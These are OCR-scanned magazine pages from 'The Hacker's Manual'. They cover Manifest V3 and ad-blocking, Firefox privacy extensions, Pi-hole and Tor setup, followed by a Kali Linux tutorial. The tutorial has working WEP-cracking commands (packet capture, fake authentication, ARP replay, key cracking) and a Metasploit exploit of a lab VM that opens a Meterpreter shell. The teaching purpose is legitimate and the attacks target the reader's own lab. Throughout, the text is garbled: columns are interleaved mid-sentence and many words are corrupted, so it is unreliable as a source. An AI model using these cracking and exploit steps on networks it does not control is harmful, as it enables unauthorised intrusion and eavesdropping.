the resource, which can be an image, advert or another so-called Privacy Sandbox model, which it says enables
page. If the URL is known to belong to an advertising “publishers and developers to keep online content
or tracking company, the advert isn’t fetched. Simples. free”, while enabling people to “enjoy their browsing
Except it’s not. Browser extensions are a risky and app experience without worrying about what
proposition at the best of times, and ones that have personal information is collected, and by whom”. All
access to all your web traffic have the potential to be very noble, we’re sure. Put simply, Google aims to
very dangerous indeed. Even if your go-to keep all user data within its own platform and offer
ad-blocker is ethically developed and open source, advertisers access to user metadata.
Currently, extensions for both Chrome and Firefox­
based browsers are built around Google’s Manifest V2,
Ublock isn’t going which offers developers the option of using an
ephemeral background-based ora persistent
background page. Manifest V3 restricts what
If you’re a Chromium addict and can't get enough of Google products
extensions can do in Chrome by making them use
(unlikely, we think), it will still be possible to block ads on Chrome once
Manifest V2 is deprecated but it’ll be fiddly and limited. service workers - ephemeral, event-based JavaScripts
UBIock Origin Lite has been specifically developed with Manifest V3 that run in the background and don’t have access to
in mind and is fully compliant with Google’s new rules. the standard website API. They can’t execute code
According to the devs, "UBOL does not require broad read/modify and they can only run for a limited time.
data permission at install time, hence its limited capabilities out of the While extensions built on Manifest V2 can read
box compared to uBlock Origin or other content blockers requiring and modify your traffic (which is necessary for an
broad read/modify data permissions at install time,” and you need to ad-blocker to function) using the chrome.webrequest
explicitly grant extended permissions on specific sites. permission, Manifest V3 does away with this capability,
UBIcck Origin Lite is still a work in progress, and seems to be replacing it with chrome.declarativeNetRequest. This
effective so far, but it’s a sticking-plaster measure at best. permission can still modify your web traffic, but does it
blind - without ever seeing what that data is, and must

48 | The Hacker’s Manual


Protect your privacy
being able to zoom in on an individual. This idea was
Manifest V3 resources
eventually scrapped, and in January 2022, Google
Manifest V3 is part of a shift in the philosophy behind user security and privacy. The introduced the Topics API, which would see
following articles provide an overview of Manifest V3, the reasons behind it, and how
to approach it;
Chromium-based browsers identify five of your
interests and serve advertising based on those.
Platform vision
Explains how the Manifest V3 changes fit into the big picture of where the platform
By eliminating personal information from the
is going. equation, Google can justify removing ad-blocking
OvervLewof Manifest V3
functionality. Advertising companies aren’t tracking
Summarizes the technical changes introduced with Manifest V3.

Migration guide
you any more, so it’s safe to allow adverts through. It
Describes how to get started updating Manifest V2 extensions so they work in works as a rationale, but it’s sure to annoy internet
Manifest V3.

Migration checklist
users everywhere.
Provides a quick checklist to help adapt your extension to Manifest V3.

emember your preferences. and optimize your experience doto.i-. Q* H


Just ditch Chrome
Most browsers are based on Google’s Chromium
Google makes it easy for developers to switch to engine, including Chrome, Microsoft Edge, Opera and

I Manifest V3, but it's unclear how many will want to, Chromium itself - and all will be affected in some way
when Google completely disables Manifest V2 APIs in
declare, ahead of time, based on a very limited set of January 2023.
Google-defined rules. It stops extensions analysing One Chromium-based exception is Brave, which
individual requests, making most ad-blockers useless. doesn’t rely on extension APIs to block tracking and
Extensions won’t be able to load remote code either
- and all code must be approved by Google before the
extension is made available to users. Google’s motivation
This means you’re not going to fall victim to a dodgy
extension stealing your bank details or executing “It’s excruciatingly difficult to
arbitrary code to spoil your day, so, yes, it’s fair to say
that, in one way at least, Google is acting to protect
believe that Big G’s primary aim is
your security and privacy.
But if we’re being real for a second here, Google is a
to protect your privacy.”
surveillance advertising business - a phrase you have
doubtless read in these pages before and will again. ads, so ad-blocking should continue as normal. No
This means the more the company knows about guarantees, though - if Brave gains enough ground to
you, the more money it can make by targeting adverts thwart Google’s plans, Google may change the rules in
specifically to you. Its other businesses - Search, Maps, a way that harms Brave specifically.
Android, Gmail and Google Docs - are ancillary to this. A better option would be to use Mozilla’s Firefox
With that in mind, it’s excruciatingly difficult to believe instead, which has committed to supporting Manifest
that Big G’s primary aim is to protect your privacy. V2 indefinitely. This means that existing ad-blocking
extensions will still work and should continue to work
Why Google, why?! for ever.
We imagine that Google and its advertising businesses Firefox is currently the fourth most popular web
would have been quite happy doing business the way browser, boasting a 3.5% market share and coming in
they’ve always done it: matching people to their after Chrome (65%), Safari (18%) and Microsoft Edge,
interests and adverts accordingly. of all things (4%). Whether extension developers
Privacy organisations, including the Electronic consider it worth investing their blood, sweat and
Frontier Foundation and NOYB.EU, have been tears into such a small segment remains to be seen.
increasingly making angry noises at the way web
users are stalked through the internet jungle, like tom’sHARDWAI
hapless sightseers by a particularly hungry anaconda. I
The GDPR is one result of this and has resulted in
massive fines for dozens of corporations, including
Google, for failing to respect user privacy and data.
But campaigners in Europe would like to see more
safeguards in place - ideally, they would like no
tracking at all.
Ad-blockers have also become more competent
and ubiquitous in recent years. You don’t need to be
particularly technical to use one, and once it’s installed,
you can completely forget about it.
Google’s Privacy Sandbox is the company’s second
attempt to decouple individual users from the data it
collects while still maximising ad revenue. The first
effort, known as Federated Learning of Cohorts,
assigned individuals to a cohort that shared common
attributes and interests. Adverts would be served to > You wouldn't believe how many hoops we had to jump through to get a pic of
the cohort as a whole without the advertisers ever an ad on a website..

The Hacker’s Manual | 49


Security

Firefox extensions
Let’s defend our browsing with some pointy plugins
that’ll keep the wolves at bay.

he world isn’t going to end when Google pulls the

T plug on Manifest V2 for Chrome, so let's


investigate the very best anti-tracking and
ad-blocking extensions for Firefox. With Chrome and the
long-term viability of extensions on other Chromium-
based browsers in doubt, it's increasingly clear that Firefox
is the way forward.
We’d love to recommend Linux-specific browsers
such as Falkon, but the built-in adblock extension does
not have a stellar reputation for being user-friendly, and
Falkon's overall performance is not quite up there with
the best Mozilla has to offer. Perhaps the inevitable > Privacy Possum breaks embedded YouTube videos and
blocks downloads from certain sites. That doesn’t seem
exodus from the Googlesphere will prompt increased
like a downside...
investment in competent independent browser
development, but then again, maybe not. placeholders, so you don’t even register that
Firefox has another major advantage in the advertisements are missing.
upcoming browser wars: it’s truly multi-platform, with UBlock Origin can be turned on and off on a per-site
builds available for Windows, Mac OS, Android and iOS. basis - if, for some reason, you like viewing ads and
Linux-specific browsers have a tiny market share of being tracked - and individual elements can be
what is already a tiny market share, and worthy as they removed from a page with the click of a button.
may be, can’t attract the kind of massive investment
that is needed. Privacy Badger
As we said, Firefox will remain Manifest V2 UBlock Origin is a great anti-tracking extension, but its
compatible until the sun explodes, and all the primary purpose is as an ad-blocker. Privacy Badger,
extensions that currently help you to stay safe and from the Electronic Frontier Foundation, is a little
> While it's anonymous online will remain until the heat death of the different, and as with the remaining items on this list, its
reassuring to universe. Here's what you should be looking at... sole raison d'etre is to stop companies and individuals
know that we tracking you as you go about your daily routine.
have “strong uBlock Origin We say ‘‘routine’’ because Privacy Badger actually
protection
We’ve been using uBlock Origin on our personal does learn your routine. It learns your browsing habits
against web
machines since it came to our attention in May 2016 as and blocks tracking scripts and cookies in the
tracking”, it's
less comforting Mozilla's Extension of the Month. It’s the first and often background. If an advertiser seems to be tracking
to see our only add-on we install when we initialise a new machine. you across multiple domains, Privacy Badger blocks
unique browser Once the extension is installed and activated, that advertiser from loading any more content in your
fingerprint. you rarely even notice it’s there. It doesn’t leave ad web browser.
This demonstrates an obvious difference in
Cow Xxjf lacks x + 00
philosophy between Privacy Badger and ad-blocker­
C Qfi efforgrt»Jtsf&Mt-l&fp«_wbo<b“{‘v2i%lA{'pluginitSJA*Mu9«r*0%lA+C 0 & 0 f £
based anti-tracking extensions in that Privacy Badger
tr»ck>ng protection. The first tecton gives
you » general idea of what your browser
configuration is blocking (or not blocking). Our tests indicate that you have strong recognises that the internet as we know it today needs
Below that is a list of specific browser
charKteristci in the format that a tracker
protection against Web tracking. advertisements to function. It allows the ‘good adverts’
would view -.hem. we also provide
description, of bow they are incorporated
into your fingerprint. to be displayed - earning revenue for hard-working,
IS YOUR BROWSER:
ethical websites - while fooling unethical ad and
HOW CAN TRACKERS TRACK Blocking tracking ads? Yes tracking networks into thinking that you have
YOU?
Trackers use a variety of methods to
identify and track users. Mott often, this
Blocking invisible trackers? Yes disappeared entirely.
includes tra:k>ng cookies, but it can also Protecting you from fingerprinting? Your browser has a unique fingerprint
include browser fingerprinting. It has no built-in blacklists and, by default, Privacy
Fingerprinting is a sneakier way to track
users and n-akes it harder for users to
regain control of their browsers. Th«s report Still wondering how fingerprinting works? Badger does not block first-party trackers, such as the
measure, how easily tracker, might be
able to fihgwpriM your browser.
ones used by a site for analytics purposes. It’s only
LEARN MORE
once trackers start stalking you to a different site that
HOW CAN I USE MY RESULTS Arote. because tracking techniques are complex. subtle, and constsntly esolving Cover Your Tracks does not
TO BE MORE ANONYMOUS? measure all forms of tracking and protection. Privacy Badger takes action.
Knowing how easily identifiable you are. or
whether you are currently blocking A side effect of starting with a blank slate and
trackers, can help you know what to do
next to prottct your privacy. While most Your Results
trackers ear be derated by browser add­
Your browser fingerprint appears to be unique among the 219,363 tested in the past 45
blocking trackers based on behaviour is that ads will
ons or built-in protection mechanisms, the
sneakiest tuckers have ways around even days. slowly start to wink out of existence as their tracking

50 | The Hacker's Manual


Protect your privacy

Explore my Pi-hole
In all of this panic about browser-based and checks URLs against lists of known where you can update the blocklists,
ad-blockers and Google’s extension ad servers. If a URL is on the list, the block new URLs on a one-off basis and,
shenanigans, we neglected to mention resource (usually an advert) isn’t loaded. if you're especially sneaky, monitor what
our own preferred solution. Although Pi-hole was designed with the your kids are doing online.
Pi-hole was built to run on a Pi in mind, it runs happily on most One huge advantage Pi-hole has over
Raspberry Pi. It can run happily on a Pi hardware built since the millennium. If the traditional extensions is that you can set
Zero and sit behind your couch, drawing only spare machine you have is a Windows it up so your entire network is covered -
less wattage than a solar-powered box, you can install it using WSL. this is a big deal if everyone in your
torch. Installation is simple and, once set up, house has at least one PC, a phone and
Sitting between your browser and the you can access Pi-hole’s admin a streaming device. You can save hours.
wider internet, it intercepts all requests functions through a web interface, Days even.

becomes obvious. And as for what badgers have to do block each tracker either just on the current page or
with anything, we don't know. across the entire web. Ghostery doesn’t use blacklists
and leaves decisions in your hands.
Privacy Possum Ghostery is also very focused on performance
Privacy Possum is based on the excellent Privacy and improving user experience - by default, it
Badger and was created by one of the engineers who blocks trackers that slow down the web and unblocks
worked on the project. It takes a completely different trackers if blocking them breaks the web page you’re
approach to preventing companies from following you. attempting to access.
Put simply, it doesn’t. To our mind, however, this isn’t ideal, because it could
Privacy Possum allows trackers to stalk you all they lead to a situation in which tracking companies
want - but they’ll never ever be able to get an accurate deliberately create trackers that break websites if they
idea of who it is they’re following. are notallowed.
It blocks cookies that let trackers uniquely identify
you across websites. It blocks refer headers that reveal The bottom line
your browsing location. It blocks etag tracking, which Each of these anti-tracking extensions focuses on a
leverages browser caching to uniquely identify you. different area. UBlock Origin is for people who hate
And it blocks browser fingerprinting, which tracks the adverts and hate tracking; Privacy Badger is all about
inherent uniqueness of your browser. heuristic learning and making sure that trackers behave
Without these unique identifiers, it doesn’t matter themselves; Privacy Possum would prefer that tracking
who is tracking you, they will never be able to link any of companies go bust; while Ghostery is about a fast, clean
the information, and better yet - it actually costs them user experience.
money without giving anything in return. Which extension you go for is up to you, depending
Browser fingerprinting - using the attributes of your on which model best suits your needs. We like them all.
browser such as installed fonts, screen resolution and Earlier, we mentioned in passing that extensions > Aww, look:
language packs - is also spoofed, rather than hidden. occasionally change ownership or are deliberately Ghostery has
tiny Pac-Man-
To use an analogy, if the tracking companies or compromised by their developers in order to make a
style ghosts
government agents on your tail are looking for a quick buck from users. We seriously doubt that the
to illustrate
short, blonde woman with tattoos, Privacy Possum creators of uBlock Origin, Privacy Possum, Privacy
its spooky
transforms you into a 6’ 5” skinhead bloke with a flat Badger or Ghostery are going to sell out, but we credentials. And
cap and a natty moustache. Then it turns you into can’t guarantee it. Make sure you check the GitHub there’s even an
something else instead. repositories regularly for any reported problems or emoticon of a
Why possums? Possibly because they pretend to be changes in contributors. frightened cat!
dead. The extension creator hasn’t said.

Ghostery
Sounds spooky, eh? We love that it conjures up
images of us coasting across the internet unseen and
undetected, like some child of an exotic phantasm -
especially as this feature was written in the run-up
to Halloween.
Ghostery advertises itself as enabling “cleaner,
faster, safer browsing", and as its mascot, it has a
friendly little spook.
In reality, Ghostery isn’t that much different from
the other blockers and offers you control on a tracker-
by-tracker basis from a handy and visually pleasing
dashboard, which lists all of the trackers on the page
you’re viewing or interacting with. From there, you can

The Hacker’s Manual | 51


Security

Peeling open Tor 12


We might not be in a position to share state secrets with foreign
governments, but if we were, we'd use the Tor Browser.
sers who want to keep their private business secure during popular uprisings such as the Arab

U private when online often turn to VPN


(virtual private network) providers. It's a sensible

online privacy, it's SEO-optimised, VPN-promoting articles


Spring, dissident movements in Iran, Turkey and
Russia, as well as helping NSA leaker Edward Snowden
precaution, and when you search for terms related to exfiltrate state secrets from his workplace. It’s also
good for those engaged in normal, everyday activities,
that occupy the first few pages of results, because VPN but don't want to be watched.
companies pay out up to 60% for sales through affiliate
links. Want your online tech publication to flourish? VPNs Many layers
are where the cash is. Onion routing works by bouncing your connection
VPNs can hide your location and your activities, but between different routers so that they’re hard to track.
you need to pay for the privilege and create an account Let’s say that you’re sitting at home and want to
- and you can never be truly certain that the company read an article on http://9to5mac.com. Such is your
that takes your money isn’t straight up selling your shame that you can’t bear the thought of anyone even
details to data brokers, handing it over to the police or, knowing that you’ve connected to the 9to5Mac server.
If you just type the URL into your browser, your ISP
How tor operates knows you’ve visited the site, 9to5Mac’s ISP knows
you’ve visited the site, as do the admins of 9to5Mac
“Onion routing works by itself. Along the way, you will also have queried DNS
servers and there may even be snoopers on your own
bouncing your connection network who are interested in what you do online.

between different routers so that Potentially, there are dozens of individuals who are
now aware that you secretly long for an overpriced,
they’re hard to track.” underperforming slab of shiny metal on your desktop.
If you use Tor, all information, including your IP
worse, to Disney copyright lawyers. Everybody loves address, is wrapped in multi-layered encryption and
getting paid twice, right? sent through a network of randomly selected relay
Commercial VPNs are designed with a very specific servers. Each of these relays only knows a small
threat model in mind, and for most people looking for section of the route and not the entire journey. The
a level of anonymity which would allow them to sneak final stop on this journey is known as the exit node
subversive messages past government censors, for and it’s the exit node that makes the final connection
> Connecting to
instance, the Tor Network is where it’s at. to http://9to5mac.com.
the Tor network
Tor was born in the 1990s as The Onion Routing All nodes are provided by organisations and
can be as easy
project, from the minds of engineers at the US Naval individuals who volunteer their bandwidth and
as pressing a
button. It may
Research Lab, who wanted a way of connecting resources to the cause of internet anonymity.
take you a computers on the internet without revealing the parties Routing messages through Tor can be done in a
few attempts, involved - even if someone is monitoring the network. variety of ways, including email plugins, but the most
though. It’s been instrumental in keeping communications common method is by using the Tor Browser, which is
built on Firefox - the most recent release is the alpha
version of Tor 12.
C ©tor Browser NotConnected £? O Vf —

Set up Tor on your Linux desktop


The Tor Project offers official repositories for Ubuntu
Connect to Tor and Debian, which is handy if you want updates taken
Tor Browser routes your traffic over the Tor Network, run by thousands of volunteers around the care of automatically.
First install the apt transport:
Always connect automatically

Configure Connection... |
$ sudo apt install apt-transport-tor
...then add the following to /etc/apt/sources.list:
$ deb [signed-by=/usr/share/keyrings/tor-archive-keyring.
gpg] tor://apow7mjfryruh65chtdydfmqfpj5b
tws7nbocgtaovhvezgccyj azpqd.onion/torproject.org
<DISTRIBUTION> main
...for the stable version, or:

52 | The Hacker’s Manual


Protect your privacy
$ deb [signed-by=/usr/share/keyrings/tor-archive-keyring. > Captchas
gpg]tor://apow7mjfryruh65chtdydfmqfpj5b are used to
tws7nbocgtaovhvezgccyjazpqd.onion/torproject.org tor- prevent bots
nightly-main -<DISTRIBUTION> main from plaguing
the Tor network
...for the unstable version. Remember to replace
with spurious
<DISTRIBUTION> with the output of
requests for
Isbjelease -c
bridges. Get used
Now: to them - you’ll
$ sudo apt update be seeing a lot
$ sudo apt install tor deb.torproject.org-keyring more.
Alternatively, you can visit www.torproject.org/
download/ and grab the Linux version (it’s the one with
Enter a bridge
the penguin). Cancel

Honestly, that code is not something you want to


copy character by character from a magazine, so we
recommend just downloading it from the website. page took even longer, Once there, Tor worked how
When you start Tor for the first time, you have the you’d expect any browser to work.
option of connecting instantly by pressing the big Streaming media and torrents are big no-nos on the
purple button. This is probably fine for most people and Tor network. The project homepage explicitly requests
gives you a more than acceptable level of anonymity that you don’t do it. You’re using volunteer resources
with the default settings. If you’re in a country where and bandwidth, which could be put to better use than
Tor is blocked, you need to click on Configure checking out the new Arctic Monkeys album, and
Connection instead, then add a new bridge. besides, performance is terrible. Torrenting is frowned
Bridges are similar to ordinary Tor relays, but are not upon - unless you’re using those torrents to distribute
listed publicly, meaning it’s difficult for authorities to secret government documents, evidence of war crimes
shut them down or compromise them. There are few of or footage of drone attacks by the CIA.
them and your connection speed suffers, but if it’s your If you’re looking for a smooth internet experience,
only option, it’s your best option. Tor isn’t the tool you’re looking for. In addition to the
Because bridge addresses are not public, you need guidelines on streaming and torrenting, and the janky
to request them. Selecting Choose A Built-in Bridge connection, you’ll run into more Captchas than usual as
gives you the option of choosing Obfs4, which makes your traffic doesn’t look exactly how web pages expect
your traffic look random, Snowflake, which routes your it to. Your exit node can be anywhere in the world, so
connection through Snowflake proxies, or Meek-azure, you could also be served localised versions of web
which makes it look like you’re using a Microsoft site. pages, in Finnish, Armenian or Spanish.
You can also request a bridge from http://torproject. If on the other hand, you’re trapped under an
org, but be aware that you need to complete a Captcha authoritarian boot in a totalitarian state, Tor is just what
first. Once set up, you can hit Connect and be on your you need.
anonymous way.

Browsing with Tor Nothing is Tor-fect


Connecting to the Tor network may take a few
attempts and transfers may be slow, especially in these True security and anonymity is impossible on the internet. Any
troubled times, when in certain parts of the world there encryption can be broken and any connection traced. All it takes is
are a lot of displaced people and resurgent dystopian vast quantities of money and resources. Tor is about as safe as can
states are cracking down extra hard on dissidents, be - even if a nation state actor is taking a particularly close interest
resistance and any mention of the word "war”. in what you’re up to online.
Without using a bridge, it took us three tries to join But that doesn't mean it’s perfect - the Tor devs are continually
the network, and several seconds to get to the spartan patching vulnerabilities, while law enforcement continues to try to
Linux Format homepage. Getting to the Gmail login exploit them. In the early 2010s, police had notable successes in
tracking down and prosecuting Tor users who traffic in child abuse.
Linux Format 295 Threat actors can also compromise Tor connections by taking
Pubtobed Tut 18 October 2C22
control of huge numbers of Tor nodes, carrying out autonomous
Sy
m New rove. eavesdropping attacks and analysing timings to expose who is
connected at one end of the network.
These attacks are not trivial and are difficult to carry out, but they
are real, and Tor users need to be aware of them.
Any easier way for authorities to compromise would-be Tor users
is to inject malware into it. In 2022, security researchers found that
searches for Tor in China led users to download a version of the
Bud the ukrnate retro emulation gammg experience relrve your Amiga Basic days and explore the huge open sou ce software that saves user’s browsing history and form data, and
emulation world1 Discover al the software to enjoy the classic computer days of the ZX Spectrum. Commodore 64. Atari
ST. Amiga and more. Wei even run a mainframe lor fun even downloads malicious components to computers with Chinese
PLUS Search your PC layer morwor your bandwidth, perfect your 3D pruts, ful disk encryption, the best LQhtweijht
cfcsiros tested we drve nlo Ktibeine'.es and loads mote’ IP addresses.
Only download Tor from the official site or repository. If you can’t
> The Linux Format website looks as glorious when
access these, get a copy from someone you know and trust.
viewed through the Tor Browser as it looks through
any other browser.

The Hacker’s Manual | 53


Security

Kali Linux
Hack Wi-Fi, break things
We’re left wondering how the goddess Kali feels
about being associated with so many script kiddies?

efore we do anything, a standard other members of your household what original WPA has been deprecated, but is still
disclaimer: Do not use any of you're up to. much more secure than WEP). Cracking
these techniques against a With that out of the way. we can get on with wireless networks (not just WEP ones) isn’t
machine that’s not under your some introductory penetration testing. You just a matter of repeatedly trying to connect
control, unless you have been given explicit can use Kali straight from the disc, install it. or using different passwords as most routers
permission to do so. would blacklist the MAC
This guide could potentially address of any device that
be used to access things that “Do not use any of these tried that. Instead, a more
you're not supposed to, and if
you get caught (and, believe us,
techniques against a machine passive approach is required,
so we set our wireless adaptor
you will get caught if this guide that’s not under your control.” to a special mode where it
is your only source) you might silently sucks up all packets as
find yourself at the wrong end of the just install the tools (wiresharkand aircrack-ng they fly through the air, rather than sending
Computer Misuse Act, or whatever is the are available in most repos) on your preferred any of its own. Often called ‘monitor’ mode.
legislation in your locale. Even if it doesn't get Linux distribution (distro). For our first trick, We won't cover setting up a WEP network
to the courts, being woken up at 6am by law well show you how trivially easy it is to crack a here, you can do it with an old router or even
enforcement officers demanding that you WEP-secured wireless network. The on your current one, so long as everyone else
surrender all your hardware is no fun. Also if, underlying attacks used by aircrack-ngfirst in the household knows their network
for example, you're using Wireshark io collect came into being about 15 years ago. and activities are potentially all visible. Our
packets from your home wireless network, everyone should be usingWPA2 fortheir preferred solution is to set up a Raspberry Pi
then as a matter of course you should tell password-protected networks now (the running hostapd. the relevant hostapd.contig

54 | The Hacker's Manual


Kali Linux
file looks like: commands accordingly. You can check that monitor mode is
interface=wlanO indeed active by running iwconfig wlanOmon.
driver=nl80211 Note that in Kali Linux, unlike pretty much every other
bridge=brO distro. the default user is root. Just as well because most of
ssid=WEPnet these commands need privileged access to the hardware. Kali
hw_mode=g isn't really intended to be a general purpose distro, so the
channels usual concerns about privilege separation don't apply. Now
auth_algs=3 the fun can begin with # airodump-ng wlanOmon .
wep_default_key=O Airodump will have your adaptor hop between channels
wep_keyO=" short” and tell you everything it sees—access point names (ESSIDs)
Our 5-character key corresponds to 40 bits, which is the and MAC addresses (BSSIDs) and any clients connected to
best place to start. Cracking longer keys is certainly possible, them. Note the BSSID and channel of the network you wish to
but requires more packets and more time. We should be able attack, we'll refer to the fictitious OO:de:ad:be:ef:OO and
to crack a 40-bit key in around one minute (and that includes channel 6. Knowing the MAC address of a client connected to
the time taken to capture enough packets). Once you've got the network may come in handy later on when we come to
a target WEP hotspot set up, we can focus on our Kali Linux- inject packets. You can generate traffic by connecting to the
running attack machine. WEP network and doing some web browsing or other activity.
You should see the #data column increase as more packets
Preparing the attack are collected. When you begin to feel slightly voyeuristic,
Getting wireless devices working in Linux is traditionally a press Ctrl+c to stop the capture.
source of headaches. Some adaptors require extra firmware In a genuine penetration testing scenario though, it would
to work, and many have other peculiar quirks all their own. be cheating to generate traffic this way (we're not supposed
As such we can't really help you. but in general if your device to know the key at this stage, that's what we're trying to
works in another distro, it should do so in Kali Linux too. figure out). But we have a cunning trick up our sleeve,
Unfortunately, even if you do get it working normally, many hardware permitting. Test if your card can inject packets, this
wireless drivers will still not support monitor mode. Some works best if the attacking machine is close to the router
(such as Broadcom’s wl driver for BCM2235-2238 chipsets (which might be hard if said machine isn't portable):
commonly used in laptops) do, but require you to activate it in # aireplay-ng -9 -e WEPnet -a OO:de:ad:be:ef:OO wlanOmon
a non-standard way, others claim to but don't. All in all it's a Hopefully you'll see something like this, the replay attack
bit of a minefield, but the aircrack_ng website maintains an won't work well unless packets can be injected reliably:
up to date list showing the state of various chipsets at 02:23:13 00:13:EF:C7:00:16 - channel: 6 - ‘WEPnet’
www.aircrack-ng.org/doku.php?id=compatibility_drivers.
Before we attempt to activate monitor mode, it's a good
idea to disable NetworkManager or any other process which
talks to the network card (wpa_supplicant, avahietc). These
might interfere with things and the last thing we need is
interference. Once the device is in monitor mode it will no
longer be a part of the network, so you won't be able to
browse the web etc unless you also have a wired connection.
To test if monitor mode is available on your device, fire up Kali
Linux, open up a terminal and run # airmon-ng start wlanO 6
replacing wlanO with the name of your wireless interface
(which you can find out from iwconfig ) and 6 with the
channel which the wireless channel of the target network
(although at this stage it doesn’t matter). You'll get a warning
if NetworkManager or friends were detected, along with their
PI DS so that they can be duly killed. Hopefully at the end of
the output there will be a message such as:
(mac80211 monitor mode vif enabled for [phyOjwlanO on
[phyOjwlanOmon)
We end up with a new network interface called wlanOmon,
different drivers will result in different names, monO is
common too, so keep a note and adjust any subsequent > DVWA is all kinds of vulnerable, we wonder what havoc this query will wreak?

We need to talk about WEP


Apart from short keys (the original WEP and doing some number crunching to derive the IP addresses), capture them and inject them
specified 40- or 104-bit keys and early routers key. For a 40-bit key. we can get away with as back to the router, so that it sends out
were forced into choosing the former), the few as 5,000 packets. If the network (or rather corresponding ARP replies. We can recognise
protocol itself is vulnerable to a statistical attack. the nodes of it within earshot of our wireless ARP request packets by their size so it
Besides the 40-bit key, a 24-bit initialisation device) is busy, this will not be a problem. If not doesn’t matter that we can't decrypt their
vector (IV) is used to encrypt the data packet. we can use a sneaky trick to get the router to contents. Each ARP reply will give us a new IV.
The most practical attack against WEP involves generate some. Specifically, we can listen for which will be another rap at the door of our WEP
collecting many IVs and their associated packets ARP request packets (used to connect MAC and network's undoing.

The Hacker's Manual | 55


Security
» 02:23:14 Ping (min/avg/max): 1.384ms/7.336ms/21.115ms If you don't see a reassuring Association successful:-)
Power: -39.73 then the next step most likely won't work as is. However, if
02:23:14 30/30:100% you add in the MAC address of a device associated with the
If that works we can inject packets of any shape or size to WEP network with the -h switch, then that ought to fix it.
the router. Unfortunately, it will generally ignore them Start the replay attack with:
because (a) we aren't authenticated with the network and (b) # aireplay-ng -3 -b 00:de:ad:be:ef:00 wlanOmon
we still can't encrypt them properly because we don't know Generating WEP traffic will speed this up, and remember
the key. What we can do, if we can figure a way around (a), is there won't be any ARP requests to replay unless something
listen for ARP requests and send them back out into the is connected to the network, so you may have to cheat a little
ether. The same ARP request can be used many times, the here to get things going. Eventually you should see the
more replays the more IVs. If packet injection isn't working numbers start increasing. The packet count in the airodump-
then just stick with generating traffic directly via the WEP ng session should increase accordingly, and it shouldn't take
network. We were able to crack our short key with just 5,000 long to capture the required packets, sometimes you'll get
packets, so without further ado, let's recommence the packet away with as few as 5,000, but generally 20-30k will suffice
capture. This time we'll restrict the channel and BSSID so that (some packets are better than others). At the top end, this is
we only capture relevant packets: only around 10MB of data. Ctrl+C both the dump and the
# airodump-ng -c 6 -b 00:de:ad:be:ef:00 -w Ixfcap wlanOmon replay processes. We'll cheat a little by telling aircrack-ngto
The -w switch tells airodump-ngto save the packets to only search for 64-bit (40+24 bits of IV) keys:
disk with the prefix Ixfcap . They are saved as raw data (.cap) # aircrack-ng output-01.cap -n 64
as well as .csv and Kismet-compatible formats, for use in If you have enough packets, aircrack-ngW\W likely figure
further analyses with other programs. With the capture out the key almost immediately. Even without the -n 64 hint
running, open another terminal and attempt to do a fake with enough packets the attack can still be swift and deadly.
authentication with the router: You may be unlucky though and sent off to get more packets,
# aireplay-ng -1 0 -e WEPnet -a 00:de:ad:be:ef:00 wlanOmon in which case run airodump-ngand aireplay-ngagain. If you
see a message about being dissociated during the replay
attack, then you will need to do another fake authentication.
The output filenames will be incremented, and you can use
wildcards on the command line, eg output*.cap to use all of
them at once.
Once you've cracked a 40-bit WEP key, the next logical
step is to try a 104-bit (13 character) one. The procedure is
exactly the same, only more packets will likely be required
(we managed it with 25,000 IVs). Cracking WPA2 keys is a
whole different ball game, there are no nice attacks, but if you
are able to capture the four-way handshake as a new device
connects, then a dictionary attack can be used.

Exploits and injections


It would be remiss of us to feature Kali Linux and not mention
the Rapid 7’s Metasploit Framework (MSF). MSF allows
security mavens to submit modules to test for (and
optionally exploit) all manner of vulnerabilities, whether it's
the latest use-after-free bug in Flash, an SQL-injection bug in
Drupal or some new way of sending the Windows Update
service into spasm. It's immensely powerful and we hardly
> Even 128-bit WEP keys can be trivially cracked with just a handful of packets. have space to even scratch the surface of it here.

Reggae Wireshark
As a pen tester, once you've got hold of a requests and acknowledgements.
wireless key there's no reason to stop However, we can tell Wireshark our key
there. Besides having access to any and these packets will surrender all of
resources on that wireless network you their secrets. Go to Edit > Preferences >
can also decrypt its traffic. Wireshark is a Protocols > IEEE 802.11 and tick the
great tool for capturing and viewing Enable decryption box. Click the ’Edit'
packets. You'll find it in Kali’s Sniffing & button next to Decryption Keys, and then
Spoofing menu, or you can install it on click on the'+' to add a new key. Ensure
any decent distro. We've already captured the type is set to WEP and enter the ASCII
a bunch of WEP-encrypted packets so codes of each character of the password,
lets have a look at those. Go to File > optionally separated by colons, eg our
Open and choose one of the output*.cap initial password short would be entered
files. Initially there's not much to see, 73:68:6f:72:74 . Once you leave the
most packets will just be listed as Preferences dialog, all the packets will
amorphous IEEE 80211 data, and there have been delightfully colour coded, all
will be some other boring network sources and destinations revealed.

56 | The Hacker's Manual


Kali Linux
Nonetheless we can illustrate some of MSF’s powers by > Metasploit
taking liberties with the Metasploitable 2 Virtual Machine Framework
There wasn't space to include it on the disc, but those who can only show
don't care about a 800MB download can get it from you the door,
http://bit.ly/MetasploitableRapid7 in exchange for some you must
walk through
details or from http://bit.ly/SFMetasploitable2 if you'c
it. Or buffer
rather get it quietly. Unzip the metasploitable-linux-2.0.0.zip
overflow your
file and you’ll find a VMware virtual machine. The actual disk
way through it.
image (the VMDK file) can happily be used in VirtualBox(with
the 'Choose an existing virtual hard disk’ option) or Qemu.
In order for the VM to be visible on the network, it needs its
virtual network adaptor to be configured in bridged mode as
opposed to NAT. In VirtualBox. we can achieve this by going to
the Network tab, and setting ‘Attached to' to ‘Bridged
Adapter'. It will then act just like a regular device attached to
your network—if DHCP is available everything should just
work, otherwise a static IP can be configured. ready to launch the attack with exploit. All going well, you
Start the VM, and then log in as user msfadmin with the should see something like:
password the same. Find the device's IP address using ip a. [*] Sending stage (46089 bytes) to 192.168.1.10
If devices on the network need static IP configured, this can [*] Meterpreter session 1 opened (192.168.1.2:4444 ->
Wedidn'thavetime
be done from /etc/network/interfaces (the VM is based on 192.168.1.10:33304)... to cover Burpsuite
Debian Lenny). There are a number of terribly configured and Followed by a new meterpreter prompt. Type help for a here, but it's a very
vulnerable services running on this VM. so it's a particularly list of commands, they're different to Bash, although that sort powerful tool for
bad idea to run this on an untrusted network. The extra of shell is available from the shell command. If we type finding holes in
web applications.
cautious should even disconnect their routers from the execute meterpreter's getuid command, we can see that we
Unfortunately
Internet at large. We’ll use MSF to exploit the Tomcat service, have the access privileges of the tomcat55 [/user]. We could some of the more
which you can connect to by pointing a browser at port 8180 probably do some damage like this, but the Holy Grail is interestingfeatures
on the VM's IP address, which we'll use 192.168.1.10 to refer. getting root access. As luck would have it. there's a privilege areonlyavailablein
